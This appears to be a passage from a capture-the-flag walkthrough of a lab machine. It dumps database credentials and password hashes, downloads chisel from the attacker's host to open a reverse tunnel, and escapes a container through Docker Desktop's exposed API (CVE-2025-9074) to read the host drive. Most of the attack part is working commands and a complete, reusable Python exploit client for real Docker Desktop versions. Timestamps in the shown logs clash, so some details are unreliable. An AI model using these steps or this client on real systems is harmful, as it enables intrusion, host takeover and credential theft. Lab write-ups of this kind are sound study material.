www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "show tables;"
<-pf37p2j8f4t0r -D monitorsfour_db -e "show tables;"
Tables_in_monitorsfour_db
changelog
customers
invoice_tasks
invoices
tasks
users
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "describe users;"
<37p2j8f4t0r -D monitorsfour_db -e "describe users;"
Field	Type	Null	Key	Default	Extra
id	int(11)	NO	PRI	NULL	auto_increment
username	varchar(50)	NO	UNI	NULL	
email	varchar(100)	NO		NULL	
password	varchar(100)	NO		NULL	
role	varchar(50)	NO		user	
token	varchar(255)	YES		NULL	
name	varchar(100)	NO		NULL	
position	varchar(100)	NO		NULL	
dob	date	NO		NULL	
start_date	date	NO		NULL	
salary	decimal(10,2)	NO		NULL	
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u monitorsdbuser -pf37p2j8f4t0r -D monitorsfour_db -e "select username, email, password, role from users;"
<select username, email, password, role from users;"
username	email	password	role
admin	admin@monitorsfour.htb	56b32eb43e6f15395f6c46c1c9e1cd36	super user
mwatson	mwatson@monitorsfour.htb	69196959c16b26ef00b77d82cf6eb169	admin
janderson	janderson@monitorsfour.htb	2a22dcf99190c322d974c8df5ba3256b	user
dthompson	dthompson@monitorsfour.htb	8d4a7e7fd08555133e056d9aacb1e519	user
www-data@821fbd6a43fa:~/app/controllers$

Inside the Cacti database two user password hashes were found.

www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "show tables;"
<ctidbuser -p7pyrf6ly8qx4 -D cacti -e "show tables;"
Tables_in_cacti
aggregate_graph_templates
# [... cut ...]
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_auth_row_cache
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "describe user_auth;"
<er -p7pyrf6ly8qx4 -D cacti -e "describe user_auth;"
Field	Type	Null	Key	Default	Extra
id	mediumint(8) unsigned	NO	PRI	NULL	auto_increment
username	varchar(50)	NO	MUL	0	
password	varchar(256)	NO			
realm	mediumint(8)	NO	MUL	0	
full_name	varchar(100)	YES		0	
email_address	varchar(128)	YES		NULL	
must_change_password	char(2)	YES		NULL	
password_change	char(2)	YES		on	
show_tree	char(2)	YES		on	
show_list	char(2)	YES		on	
show_preview	char(2)	NO		on	
graph_settings	char(2)	YES		NULL	
login_opts	tinyint(3) unsigned	NO		1	
policy_graphs	tinyint(3) unsigned	NO		1	
policy_trees	tinyint(3) unsigned	NO		1	
policy_hosts	tinyint(3) unsigned	NO		1	
policy_graph_templates	tinyint(3) unsigned	NO		1	
enabled	char(2)	NO	MUL	on	
lastchange	int(11)	NO		-1	
lastlogin	int(11)	NO		-1	
password_history	varchar(4096)	NO		-1	
locked	varchar(3)	NO			
failed_attempts	int(5)	NO		0	
lastfail	int(10) unsigned	NO		0	
reset_perms	int(10) unsigned	NO		0	
www-data@821fbd6a43fa:~/app/controllers$ mysql -h mariadb -P 3306 -u cactidbuser -p7pyrf6ly8qx4 -D cacti -e "select username,password,realm,password_history from user_auth;"
<me,password,realm,password_history from user_auth;"
username	password	realm	password_history
admin	$2y$10$wqlo06C4isr4q9xhqI/UQOpyM/n8EDzYl/GndqhDh/2LQihzPdHWO	0	-1
guest	43e9a4ab75570f5b	0	-1
marcus	$2y$10$bPWlnZYLhoDUawu4x8vLAuCIaDbqIUe4s9t9HqFm/1gtbavD/eKGe	0	
www-data@821fbd6a43fa:~/app/controllers$

root via CVE-2025-9074 (Docker)

The changelog shows Docker Desktop 4.44.2. This version lets Linux containers reach the Docker API over the default subnet (192.168.65.7:2375), which allows managing containers and creating new containers and images; from there, when Docker runs under WSL, it is possibly feasible to reach the host storage by mounting the host disk. This likely matches the situation on this machine, since the WinRM port is listening while we have access to a Linux container.

Version  Date          Title                  Change          Description
V.1.7    May 16, 2025  Infrastructure Notice  Infrastructure  Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.

We confirm it with a curl request to 192.168.65.7:2375/info, which returns engine details with no authentication at all: OperatingSystem is Docker Desktop, the kernel is microsoft-standard-WSL2, two containers are running and three images are present locally.

www-data@821fbd6a43fa:~/html/cacti$ curl -s 192.168.65.7:2375/info
{"ID":"e9938dea-4226-47b1-9455-ca938cb3e01a","Containers":2,"ContainersRunning":2,"ContainersPaused":0,"ContainersStopped":0,"Images":3,"Driver":"overlayfs","DriverStatus":[["driver-type","io.containerd.snapshotter.v1"]],"Plugins":{"Volume":["local"],"Network":["bridge","host","ipvlan","macvlan","null","overlay"],"Authorization":null,"Log":["awslogs","fluentd","gcplogs","gelf","journald","json-file","local","splunk","syslog"]},"MemoryLimit":true,"SwapLimit":true,"CpuCfsPeriod":true,"CpuCfsQuota":true,"CPUShares":true,"CPUSet":true,"PidsLimit":true,"IPv4Forwarding":true,"Debug":false,"NFd":81,"OomKillDisable":false,"NGoroutines":108,"SystemTime":"2026-02-02T07:15:15.986297504Z","LoggingDriver":"json-file","CgroupDriver":"cgroupfs","CgroupVersion":"2","NEventsListener":12,"KernelVersion":"6.6.87.2-microsoft-standard-WSL2","OperatingSystem":"Docker Desktop","OSVersion":"","OSType":"linux","Architecture":"x86_64","IndexServerAddress":"https://index.docker.io/v1/","RegistryConfig":{"IndexConfigs":{"docker.io":{"Mirrors":[],"Name":"docker.io","Official":true,"Secure":true},"hubproxy.docker.internal:5555":{"Mirrors":[],"Name":"hubproxy.docker.internal:5555","Official":false,"Secure":false}},"InsecureRegistryCIDRs":["::1/128","127.0.0.0/8"],"Mirrors":null},"NCPU":2,"MemTotal":1995177984,"GenericResources":null,"DockerRootDir":"/var/lib/docker","HttpProxy":"http.docker.internal:3128","HttpsProxy":"http.docker.internal:3128","NoProxy":"hubproxy.docker.internal","Name":"docker-desktop","Labels":[],"ExperimentalBuild":false,"ServerVersion":"28.3.2","Runtimes":{"io.containerd.runc.v2":{"path":"runc","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\
",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"namespaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEASE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCM
P_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExtensions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}},"nvidia":{"path":"nvidia-container-runtime","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"nam
espaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEASE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCMP_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExten
sions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}},"runc":{"path":"runc","status":{"org.opencontainers.runtime-spec.features":"{\"ociVersionMin\":\"1.0.0\",\"ociVersionMax\":\"1.2.0\",\"hooks\":[\"prestart\",\"createRuntime\",\"createContainer\",\"startContainer\",\"poststart\",\"poststop\"],\"mountOptions\":[\"async\",\"atime\",\"bind\",\"defaults\",\"dev\",\"diratime\",\"dirsync\",\"exec\",\"iversion\",\"lazytime\",\"loud\",\"mand\",\"noatime\",\"nodev\",\"nodiratime\",\"noexec\",\"noiversion\",\"nolazytime\",\"nomand\",\"norelatime\",\"nostrictatime\",\"nosuid\",\"nosymfollow\",\"private\",\"ratime\",\"rbind\",\"rdev\",\"rdiratime\",\"relatime\",\"remount\",\"rexec\",\"rnoatime\",\"rnodev\",\"rnodiratime\",\"rnoexec\",\"rnorelatime\",\"rnostrictatime\",\"rnosuid\",\"rnosymfollow\",\"ro\",\"rprivate\",\"rrelatime\",\"rro\",\"rrw\",\"rshared\",\"rslave\",\"rstrictatime\",\"rsuid\",\"rsymfollow\",\"runbindable\",\"rw\",\"shared\",\"silent\",\"slave\",\"strictatime\",\"suid\",\"symfollow\",\"sync\",\"tmpcopyup\",\"unbindable\"],\"linux\":{\"namespaces\":[\"cgroup\",\"ipc\",\"mount\",\"network\",\"pid\",\"time\",\"user\",\"uts\"],\"capabilities\":[\"CAP_CHOWN\",\"CAP_DAC_OVERRIDE\",\"CAP_DAC_READ_SEARCH\",\"CAP_FOWNER\",\"CAP_FSETID\",\"CAP_KILL\",\"CAP_SETGID\",\"CAP_SETUID\",\"CAP_SETPCAP\",\"CAP_LINUX_IMMUTABLE\",\"CAP_NET_BIND_SERVICE\",\"CAP_NET_BROADCAST\",\"CAP_NET_ADMIN\",\"CAP_NET_RAW\",\"CAP_IPC_LOCK\",\"CAP_IPC_OWNER\",\"CAP_SYS_MODULE\",\"CAP_SYS_RAWIO\",\"CAP_SYS_CHROOT\",\"CAP_SYS_PTRACE\",\"CAP_SYS_PACCT\",\"CAP_SYS_ADMIN\",\"CAP_SYS_BOOT\",\"CAP_SYS_NICE\",\"CAP_SYS_RESOURCE\",\"CAP_SYS_TIME\",\"CAP_SYS_TTY_CONFIG\",\"CAP_MKNOD\",\"CAP_LEA
SE\",\"CAP_AUDIT_WRITE\",\"CAP_AUDIT_CONTROL\",\"CAP_SETFCAP\",\"CAP_MAC_OVERRIDE\",\"CAP_MAC_ADMIN\",\"CAP_SYSLOG\",\"CAP_WAKE_ALARM\",\"CAP_BLOCK_SUSPEND\",\"CAP_AUDIT_READ\",\"CAP_PERFMON\",\"CAP_BPF\",\"CAP_CHECKPOINT_RESTORE\"],\"cgroup\":{\"v1\":true,\"v2\":true,\"systemd\":true,\"systemdUser\":true,\"rdma\":true},\"seccomp\":{\"enabled\":true,\"actions\":[\"SCMP_ACT_ALLOW\",\"SCMP_ACT_ERRNO\",\"SCMP_ACT_KILL\",\"SCMP_ACT_KILL_PROCESS\",\"SCMP_ACT_KILL_THREAD\",\"SCMP_ACT_LOG\",\"SCMP_ACT_NOTIFY\",\"SCMP_ACT_TRACE\",\"SCMP_ACT_TRAP\"],\"operators\":[\"SCMP_CMP_EQ\",\"SCMP_CMP_GE\",\"SCMP_CMP_GT\",\"SCMP_CMP_LE\",\"SCMP_CMP_LT\",\"SCMP_CMP_MASKED_EQ\",\"SCMP_CMP_NE\"],\"archs\":[\"SCMP_ARCH_AARCH64\",\"SCMP_ARCH_ARM\",\"SCMP_ARCH_MIPS\",\"SCMP_ARCH_MIPS64\",\"SCMP_ARCH_MIPS64N32\",\"SCMP_ARCH_MIPSEL\",\"SCMP_ARCH_MIPSEL64\",\"SCMP_ARCH_MIPSEL64N32\",\"SCMP_ARCH_PPC\",\"SCMP_ARCH_PPC64\",\"SCMP_ARCH_PPC64LE\",\"SCMP_ARCH_RISCV64\",\"SCMP_ARCH_S390\",\"SCMP_ARCH_S390X\",\"SCMP_ARCH_X32\",\"SCMP_ARCH_X86\",\"SCMP_ARCH_X86_64\"],\"knownFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"],\"supportedFlags\":[\"SECCOMP_FILTER_FLAG_TSYNC\",\"SECCOMP_FILTER_FLAG_SPEC_ALLOW\",\"SECCOMP_FILTER_FLAG_LOG\"]},\"apparmor\":{\"enabled\":true},\"selinux\":{\"enabled\":true},\"intelRdt\":{\"enabled\":true},\"mountExtensions\":{\"idmap\":{\"enabled\":true}}},\"annotations\":{\"io.github.seccomp.libseccomp.version\":\"2.5.4\",\"org.opencontainers.runc.checkpoint.enabled\":\"true\",\"org.opencontainers.runc.commit\":\"v1.2.5-0-g59923ef\",\"org.opencontainers.runc.version\":\"1.2.5\"},\"potentiallyUnsafeConfigAnnotations\":[\"bundle\",\"org.systemd.property.\",\"org.criu.config\"]}"}}},"DefaultRuntime":"runc","Swarm":{"NodeID":"","NodeAddr":"","LocalNodeState":"inactive","ControlAvailable":false,"Error":"","RemoteManagers":null},"LiveRestoreEnabled":false,"Isolation":"","InitBinary":"docker-init","ContainerdCommit":{"ID":"05044ec0a9
a75232cad458027ca83437aae3f4da"},"RuncCommit":{"ID":"v1.2.5-0-g59923ef"},"InitCommit":{"ID":"de40ad0"},"SecurityOptions":["name=seccomp,profile=builtin","name=cgroupns"],"FirewallBackend":{"Driver":"iptables"},"CDISpecDirs":["/etc/cdi","/var/run/cdi"],"DiscoveredDevices":[{"Source":"cdi","ID":"docker.com/gpu=webgpu"}],"Containerd":{"Address":"/run/containerd/containerd.sock","Namespaces":{"Containers":"moby","Plugins":"plugins.moby"}},"Warnings":["WARNING: DOCKER_INSECURE_NO_IPTABLES_RAW is set"]}
www-data@821fbd6a43fa:~/html/cacti$

Port Forwarding

We forward the API to our machine with Chisel (reverse tunnel R:2375:192.168.65.7:2375), so the docker CLI and the PoC can reach it at 127.0.0.1:2375.

www-data@821fbd6a43fa:/tmp/tmp$ curl 10.10.14.26/chisel_linux -o chisel; chmod +x chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9.7M  100  9.7M    0     0  2876k      0  0:00:03  0:00:03 --:--:-- 2876k
www-data@821fbd6a43fa:/tmp/tmp$ ./chisel client 10.10.14.26:7070 R:2375:192.168.65.7:2375
2025/12/07 05:46:42 client: Connecting to ws://10.10.14.26:7070
2025/12/07 05:46:42 client: Connected (Latency 69.992734ms)
❯ ./chisel_linux server --reverse --port 7070
2025/12/06 23:46:17 server: Reverse tunnelling enabled
2025/12/06 23:46:17 server: Fingerprint mRjX1huwFOxQyx2VIUd6pbI7h8QJ+HXm0ArI/BWQGBM=
2025/12/06 23:46:17 server: Listening on http://0.0.0.0:7070
2025/12/06 23:47:12 server: session#1: tun: proxy#R:2375=>192.168.65.7:2375: Listening

CVE-2025-9074

We clone the PoC-for-CVE-2025-9074 repository that hosts the exploit. It first checks that the API answers, tries to pull the alpine image, creates a container from it with the host drive bind-mounted at /mnt, starts it, and finally enters it with docker exec.

# 1 - Verify the API is reachable
GET http://127.0.0.1:2375/info

# 2 - Try to pull the `alpine` image (fails on this box; step 3 still works if the image is already local)
POST http://127.0.0.1:2375/images/create?fromImage=alpine&tag=latest

# 3 - Create a container from `alpine` with the host filesystem bind-mounted at /mnt
POST http://127.0.0.1:2375/containers/create
{
  "Image": "alpine",
  "Cmd": ["/bin/sh"],
  "Tty": true,
  "HostConfig": {
    "Mounts": [
      {
        "Type": "bind",
        "Source": "/run/desktop/mnt/host/c/",
        "Target": "/mnt"
      }
    ]
  }
}

# 4 - Start the container
POST http://127.0.0.1:2375/containers/<container_id>/start

# 5 - Access the container (docker CLI pointed at the forwarded API)
docker exec -it <container_id> sh
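The same sequence as a small, dependency-free Python client, added here as an example; it is not the PoC repository's code nor anything from the box. It uses only the Docker Engine API endpoints listed above, adds the two checks a tester wants before creating anything (is this really the Docker Desktop engine on WSL2, and does the Desktop version predate the fix), and replaces the final `docker exec` with the API's own /exec endpoints so no docker CLI is required. Assumptions: the API addresses and host path are the ones from this write-up, the sample /info dict is a constructed trimmed copy of the box's response, and the fixed version 4.44.3 is taken from Docker's advisory for CVE-2025-9074.

```python
"""Added example: Docker Engine API client for the CVE-2025-9074 steps (not the PoC's code)."""
import json
import urllib.error
import urllib.request

DOCKER_DESKTOP_API = "http://192.168.65.7:2375"   # reachable from inside a container (write-up)
FORWARDED_API = "http://127.0.0.1:2375"           # chisel-forwarded copy on the attacker box
HOST_C_DRIVE = "/run/desktop/mnt/host/c/"          # host drive as the WSL2 backend exposes it (PoC)
FIXED_IN = (4, 44, 3)                              # Docker Desktop release that closed CVE-2025-9074

# Constructed sample: the fields of this box's GET /info response that matter here.
SAMPLE_INFO = {
    "Containers": 2, "Images": 3, "ServerVersion": "28.3.2",
    "KernelVersion": "6.6.87.2-microsoft-standard-WSL2",
    "OperatingSystem": "Docker Desktop", "OSType": "linux",
}


def assess_info(info: dict) -> dict:
    """Interpret GET /info: Docker Desktop engine on a WSL2 backend, with a local image to use?"""
    return {
        "docker_desktop": info.get("OperatingSystem") == "Docker Desktop",
        "wsl2_backend": "microsoft-standard-WSL2" in info.get("KernelVersion", ""),
        "server_version": info.get("ServerVersion", ""),
        "images_present": info.get("Images", 0) > 0,
    }


def desktop_version_vulnerable(version: str) -> bool:
    """True when a Docker Desktop version string such as '4.44.2' predates the fix."""
    return tuple(int(p) for p in version.split(".")) < FIXED_IN


def build_container_spec(image="alpine", host_path=HOST_C_DRIVE, target="/mnt") -> dict:
    """Body for POST /containers/create that bind-mounts the host drive into the container."""
    return {
        "Image": image,
        "Cmd": ["/bin/sh"],
        "Tty": True,
        "HostConfig": {"Mounts": [{"Type": "bind", "Source": host_path, "Target": target}]},
    }


class DockerApi:
    """Just enough of the Engine API to reproduce the PoC without the docker CLI."""

    def __init__(self, base=FORWARDED_API, timeout=15):
        self.base, self.timeout = base.rstrip("/"), timeout

    def _call(self, method, path, body=None, raw=False):
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(self.base + path, data=data, method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=self.timeout) as resp:
            out = resp.read()
        if raw:                      # streaming or empty (204) responses are not JSON documents
            return out
        return json.loads(out) if out else {}

    def info(self) -> dict:
        return self._call("GET", "/info")

    def try_pull(self, image="alpine", tag="latest") -> bool:
        """Pull may fail (it returned 500 on this box); creation still works if the image is local."""
        try:
            self._call("POST", f"/images/create?fromImage={image}&tag={tag}", raw=True)
            return True
        except urllib.error.HTTPError:
            return False

    def create_and_start(self, spec: dict) -> str:
        cid = self._call("POST", "/containers/create", spec)["Id"]
        self._call("POST", f"/containers/{cid}/start", raw=True)
        return cid

    def exec_run(self, cid: str, cmd: list) -> str:
        """Run a command via /exec; with Tty=True the output comes back as a plain byte stream."""
        ex = self._call("POST", f"/containers/{cid}/exec",
                        {"AttachStdout": True, "AttachStderr": True, "Tty": True, "Cmd": cmd})
        out = self._call("POST", f"/exec/{ex['Id']}/start", {"Detach": False, "Tty": True}, raw=True)
        return out.decode(errors="replace")


if __name__ == "__main__":
    api = DockerApi()                        # DockerApi(DOCKER_DESKTOP_API) if run inside the container
    verdict = assess_info(api.info())
    print("engine:", verdict)
    if verdict["docker_desktop"]:
        print("pull ok:", api.try_pull())
        cid = api.create_and_start(build_container_spec())
        print(api.exec_run(cid, ["ls", "/mnt/Users"]))
```

Run it on the attacker box against the chisel-forwarded port; if python is available inside the compromised container, point it at DOCKER_DESKTOP_API instead and skip the tunnel. The version check applies to the Docker Desktop version from the changelog (4.44.2), not to the ServerVersion that /info reports (28.3.2 is the bundled engine).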

Running the exploit created the container. The alpine pull failed with HTTP 500, but creation and start still succeeded, which means an alpine image was already available locally (/info reported three images).

❯ python poc_cve_2025_9074.py
Please enter the host:port of the target Docker API (Default: 127.0.0.1:2375): 
[+] Target URL: http://127.0.0.1:2375
[1/5] Checking Docker API connection status...
[+] Connection successful! Docker API exposure detected.
Detected presence of CVE-2025-9074 vulnerability.

[2/5] Attempting to pull the required image: alpine...
[-] Image pull failed. This might cause the next step to fail. Error: 500 Server Error: Internal Server Error for url: http://127.0.0.1:2375/images/create?fromImage=alpine&tag=latest

[3/5] Preparing malicious container creation request payload...
[4/5] Sending container creation request...
[+] Container created successfully. ID: dfe295213561
[5/5] Starting container...
[+] Container started successfully!

==============================================
[*] PoC completed. You can now manually connect to the newly created container to access the host's filesystem:
    docker exec -it dfe295213561 sh
[*] Inside the container, the host's bind-mounted path will be located at /mnt.
    Example: Type 'ls /mnt' to view the host directory.
==============================================

We point DOCKER_HOST at the forwarded port and docker exec sh into the new container: we are root inside it and the host's C: drive is mounted at /mnt, which gives us user.txt.

export DOCKER_HOST=tcp://127.0.0.1:2375
❯ docker exec -it dfe295213561 sh
/ # whoami
root
# ... cut ...
/mnt/Users/marcus # cd Desktop
/mnt/Users/marcus/Desktop # ls
desktop.ini  user.txt
/mnt/Users/marcus/Desktop # cat user.txt
835f551bd7b3a052991e50195caeac60
/mnt/Users/marcus/Desktop #

And root.txt as well, since the whole drive is mounted with root's permissions.

/mnt/Users # ls -lah administrator/desktop
total 0      
drwxrwxrwx    1 root     root        4.0K Nov 10 17:54 .
drwxrwxrwx    1 root     root        4.0K Nov  3 12:05 ..
-rwxrwxrwx    1 root     root         282 Mar 24  2025 desktop.ini
-r-xr-xr-x    1 root     root          34 Dec  6 22:31 root.txt
/mnt/Users # cat administrator/desktop/root.txt
